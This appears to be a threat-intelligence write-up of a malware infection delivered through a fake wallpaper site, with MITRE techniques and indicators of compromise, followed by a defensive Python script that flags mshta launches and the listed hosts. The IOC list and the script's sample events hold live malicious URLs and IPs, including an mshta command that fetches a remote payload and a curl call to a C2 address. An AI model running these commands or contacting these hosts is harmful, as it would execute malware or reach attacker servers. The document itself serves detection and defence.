A malware analysis recounts the author’s unexpected infection through a seemingly innocent wallpaper download. The malware, partially generated by AI, was sophisticated, capable of stealing credentials and actively evading detection. The piece serves as both a cautionary tale and a learning resource for cybersecurity best practices. Affected: personal computer, cloud service platforms, and online storage services
Keypoints :
- Initial malware infection occurred through a phishing attack disguised as a wallpaper download.
- The malware was designed to utilize obfuscation techniques and AI-generated code.
- It abused the clipboard to stage harmful commands that were then executed without the user's informed consent.
- The malicious payload was hidden using encryption and steganography techniques.
- Potential capabilities included credential theft, crypto wallet hijacking, and creating backdoors for remote access.
- Legitimate services were hijacked to host malware, raising questions about their responsibility.
- The use of AI in developing malware represents a significant leap for cybercriminals and a rising threat to cybersecurity.
- The conclusion stresses the importance of basic personal cybersecurity practices.
MITRE Techniques :
- System Binary Proxy Execution: Mshta (T1218.005): The phishing website had the victim run an mshta command that downloaded and executed the malware script.
- Obfuscated Files or Information (T1027): The malware employed layered obfuscation to hide its true functions and operations.
- Application Layer Protocol (T1071): Established command and control communication with remote servers and used it to exfiltrate stolen data.
- OS Credential Dumping (T1003): Attempted to acquire passwords and session data from various sources, targeting browsers and applications.
- Impair Defenses: Disable or Modify Tools (T1562.001): The malware attempted to bypass the Antimalware Scan Interface (AMSI) to evade script scanning and detection.
- Exfiltration Over C2 Channel (T1041): Automatically sent stolen data back to attacker-controlled servers over the established C2 channel.
Indicator of Compromise :
- [URL] https://snowy-dew-4512.fly.storage.tigris.dev/garden-bloom-alltop.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=…
- [URL] https://update33.oss-ap-southeast-3.aliyuncs.com/ruketop.mp4
- [URL] https://ddddd.kliprexep.shop/provider.png
- [IP Address] 185.147.124.181
- [IP Address] 185.195.97.57
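A small triage script for the mshta launch pattern listed under MITRE Techniques and for the network indicators above, written here as an added example; it is not the author's tooling and not code from the original write-up. It runs over constructed, Sysmon-like process-creation events embedded inline, so it works offline. The event field names, the list of parent processes worth flagging, and the assumption that the truncated first IOC URL can be matched on its hostname alone are all assumptions of this example, not facts from the page.

```python
"""Triage constructed process-creation events for mshta abuse and the page's IOCs.

Added example; not the analysed malware or the original author's tooling.
"""
import json
import re
from urllib.parse import urlsplit

# Network indicators from the page. The first IOC URL is truncated ("...")
# in the write-up, so it is matched on its hostname only (assumption).
IOC_HOSTS = {
    "snowy-dew-4512.fly.storage.tigris.dev",
    "update33.oss-ap-southeast-3.aliyuncs.com",
    "ddddd.kliprexep.shop",
}
IOC_IPS = {"185.147.124.181", "185.195.97.57"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# Bare IPv4 literals; may also match version strings, so treat as a hint.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Parents worth flagging for mshta: a browser (launched from the phishing page)
# or explorer.exe (user pasted a clipboard command into the Run dialog).
# This list is an assumption of the example, not something the page states.
SUSPICIOUS_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "explorer.exe"}


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def extract_hosts_and_ips(text):
    """Pull URL hostnames and bare IPv4 literals out of a command line."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts, set(IPV4_RE.findall(text))


def classify_event(event):
    """Return the reasons a process-creation event is suspicious (empty if none)."""
    reasons = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            reasons.append("mshta.exe launched with a remote URL (T1218.005)")
        if parent in SUSPICIOUS_PARENTS:
            reasons.append(f"mshta.exe spawned by {parent}")
    hosts, ips = extract_hosts_and_ips(cmd)
    for host in sorted(hosts & IOC_HOSTS):
        reasons.append(f"known-bad host {host}")
    for ip in sorted(ips & IOC_IPS):
        reasons.append(f"known-bad IP {ip}")
    return reasons


def triage(log_lines):
    """Parse newline-delimited JSON events; return {EventId: reasons} for hits only."""
    hits = {}
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = classify_event(event)
        if reasons:
            hits[event["EventId"]] = reasons
    return hits


# Constructed sample events in a Sysmon-like shape; not real telemetry from the incident.
SAMPLE_LOG = r"""
{"EventId": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://ddddd.kliprexep.shop/provider.png"}
{"EventId": 2, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\App\\setup.exe", "CommandLine": "mshta C:\\ProgramData\\App\\ui.hta"}
{"EventId": 3, "Image": "C:\\Windows\\System32\\curl.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "curl -s http://185.147.124.181/up"}
{"EventId": 4, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "chrome.exe https://example.com"}
"""

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_LOG.splitlines()).items():
        print(event_id, "->", "; ".join(reasons))
```

Event 1 trips all three checks (remote URL, suspicious parent, known-bad host); event 2 is a local `.hta` launched by an installer and is left alone, which is the case a naive "any mshta" rule would over-alert on; event 3 is caught purely by the IP indicator. Swap the inline sample for real Sysmon Event ID 1 exports to use it on a host.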